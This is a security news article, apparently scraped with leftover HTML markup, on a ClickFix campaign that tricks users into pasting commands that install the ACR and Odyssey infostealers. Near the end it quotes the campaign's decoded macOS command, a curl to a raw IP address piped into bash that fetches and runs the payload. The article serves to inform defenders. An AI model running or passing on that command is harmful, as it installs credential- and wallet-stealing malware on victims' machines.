A growing social engineering technique called ClickFix has emerged as one of the most successful methods for distributing malware in recent months.<\/p>\n
This attack tricks users into copying and running commands directly into their operating systems command line interface, ultimately installing dangerous information-stealing software.<\/p>\n
The technique has proven remarkably effective because it bypasses traditional email security solutions and operates within browser sandboxes where most security tools cannot detect the malicious activity.<\/p>\n
The attack typically begins when users search for cracked software through search engines. Cybercriminals create fake landing pages<\/a> hosted on trusted platforms like Google Colab, Drive, Sites, and Groups to avoid being blocked by security systems.<\/p>\n These pages act as initial contact points that redirect victims based on their operating system. Windows users receive the ACR stealer, while macOS users are redirected to pages that deploy the Odyssey infostealer.<\/p>\n Intel471 security researchers identified<\/a> this campaign in June 2025 during proactive malware hunting operations.<\/p>\n The investigation revealed that threat actors were successfully targeting both major operating systems through a single infrastructure.<\/p>\n What makes this attack particularly concerning is its fileless execution. When victims paste the commands, malicious payloads are pulled directly into memory, making them invisible to traditional security software.<\/p>\n For Windows users, the attack chain guides victims through several redirection points before reaching a MEGA file hosting page containing a password-protected ZIP archive.<\/p>\n Inside this archive sits the ACR stealer disguised as setup.exe. The malware<\/a> not only steals credentials and personal data but also serves as a loader, installing additional threats such as SharkClipper, a cryptocurrency clipboard hijacker.<\/p>\n MacOS users encounter a different approach that involves a fake Cloudflare<\/a> security check page. When users attempt to copy what appears to be a verification string, they actually copy a Base64-encoded shell command.<\/p>\n Once decoded, this command executes:-<\/p>\n This command silently downloads and runs the Odyssey stealer, which harvests passwords, cookies, cryptocurrency wallets<\/a>, Apple Notes, Keychain entries, and system data, then compresses everything into out.zip for exfiltration.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"Infection](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEizoMKU-I_raDIpL2COrNgWD2tmHfHuY_TGIPPIl96FdVTlGaCextJvDCcH39CfwWRr9qlvfY-BMMSiAZAB4l5gAEmJbOt41iubmnSdH8UpWeg2DU68Z9OBAI34QtKxcy2iKhVoeLVfR8djZ-YTuf7kF-pe1nhN8AGZx1ebDpJNFJtz8nxSaEZKqTcBHqg\/s16000\/Infection%2520chain%2520%28Source%2520-%2520Intel471%29.webp?ssl=1\")
Infection Mechanism and Technical Execution<\/strong><\/h2>\n
![\"Fake](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjvXNADbRqcv8Io4spCYGE_73NZ7mFNuCDAJAjE-m82Syw33t9qf8_mLNLuEyFHSn4V2f3jTrlJO0qysb-8GMqrrEUF1fz2jQ2I4WKp7I5zWl2zsBSjA3XSXSA9_IvxjcRCAFWcz1sEXgrzufQlvn_YyCJGLnd0Nixsk6YWvbyO-AhMFLJDmZ_t1FTMcmE\/s16000\/Fake%2520Cloudflare%2520security%2520check%2520which%2520prompts%2520users%2520to%2520run%2520a%2520ClickFix%2520command%2520%28Source%2520-%2520Intel471%29.webp?ssl=1\")
curl - s http:\/\/45.135.232.33\/droberto39774 | nohup bash<\/code><\/pre>\n